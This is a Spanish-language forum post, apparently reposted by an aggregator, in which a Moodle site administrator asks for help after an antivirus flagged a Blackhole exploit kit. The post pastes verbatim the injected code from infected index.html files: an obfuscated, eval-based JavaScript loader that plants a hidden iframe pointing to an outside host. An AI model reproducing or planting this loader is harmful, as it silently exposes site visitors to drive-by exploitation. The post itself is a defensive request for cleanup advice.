Quantcast
Channel: Cosas de Administradores
Viewing all articles
Browse latest Browse all 9316

Malware

June 12, 2013, 6:11 am
$
0
0
by Flavia Ruiz Díaz.  

Hola,

Tengo un moodle 2.0.10 y hace unos días al intentar entrar al sitio el antivirus AVG detecta una Vulneración Blackhole exploit Kit (type 2704).

El sitio está alojado en un host contratado.

Por ahora lo que he visto es que algunos archivos index.html están infectados con código malicioso al final de cada uno, diciendo:

0c0896#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\">                                                                                                                                                                                                                                                          bv=(5-3-1);aq=\"0\"+\"x\";sp=\"spli\"+\"t\";ff=String.fromCharCode;w=window;z=\"dy\";try{document[\"\x62o\"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5c,5c,6c,68,6c,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5c,5c,6c,68,6c,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5e,58,62,6c,69,58,62,6c,6a,70,58,25,5a,66,64,26,5a,63,60,5a,62,5c,69,25,67,5f,67,1e,32,4,1,17,5c,5c,6c,68,6c,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,5c,5c,6c,68,6c,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,5c,5c,6c,68,6c,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5c,5c,6c,68,6c,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,5c,5c,6c,68,6c,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5c,5c,6c,68,6c,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5c,5c,6c,68,6c,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,5c,5c,6c,68,6c,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5c,5c,6c,68,6c,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5c,5c,6c,68,6c,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1348!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script>";

 
#/0c0896#
 
Descargué los archivos, borré el código, lo volví a subir, pero el problema persiste.
Mis preguntas puntuales son:
- forma de limpiar el código de los archivos que hayan sido infectados?
- realizando una actualización de moodle resolvería este problema puntual? se sobreescriben todos los archivos en una actualización?
 
Ya pedí cambio de contraseña FTP.
Puse el sitio en modo mantenimiento hasta tanto se resuelva el problema.
 
Gracias por la ayuda que puedan brindarme.
Saludos
Flavia
Search
Viewing all articles
Browse latest Browse all 9316

Trending Articles

Mi 530d no arranca, códigos de avería

October 19, 2016, 11:33 am

Ley Memoria Histórica o Democrática 2022 – Matrimonios con españoles – Cuba...

October 26, 2022, 2:23 am

Coronel de la Guardia Nacional asume dirección de Polibolívar

July 7, 2014, 3:13 pm

TELEVISOR KONKA 43 PULG TV5-43K2 - 850.00USD

October 17, 2015, 6:05 am

Silent Hill 2: Revelation (2012) 720p BRRip Dual Español Latino-Inglés

February 1, 2013, 7:33 am

Merluzas en Airfryer con sofrito de pimientos rojos

February 5, 2018, 6:00 am

[Wii] Silent Hill Shattered Memories [NTSC][WBFS][ESPAÑOL][MEGA]

September 24, 2018, 10:52 am

Gobernador de Anzoátegui decreta 14 de noviembre como feriado no laborable

November 11, 2016, 12:43 pm

The Cranberries – When You’re Gone-Pronunciación Letra Traducción

April 25, 2018, 11:13 pm

QUÉDATE, BUEN JESÚS. Autor: Luis Iruarrízaga

May 24, 2015, 11:13 pm

Matan a dos personas en colonia Reparto Lempira, San Pedro Sula

February 10, 2019, 12:09 am

Profetas de la Ciencia Ficción (Serie) Castellano

June 10, 2014, 11:25 am

Fallece en Mérida el empresario Alvaro Juanes Ancona

December 27, 2014, 5:55 pm

ACTIVIDAD: El primer milagro de Jesús (para los más chiquitos)

September 3, 2022, 2:39 pm

Elodia, ahora en Playboy

October 19, 2010, 8:39 am

Reguetoneros y productores que perdieron la vida

October 20, 2016, 8:39 am

Coche de sustitucion en BMW al pasar campaña EGR

November 19, 2019, 3:13 am

CDG INTERROGA A ZETA SECUESTRADOR DE TAMPICO

February 4, 2016, 11:54 pm

Ayuda!!!! Notificacion de Demanda Coppel

April 28, 2017, 2:34 am

"MI VIDA FUE SIGNADA POR LA TRISTEZA Y LA POBREZA"

March 12, 2013, 7:53 pm
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>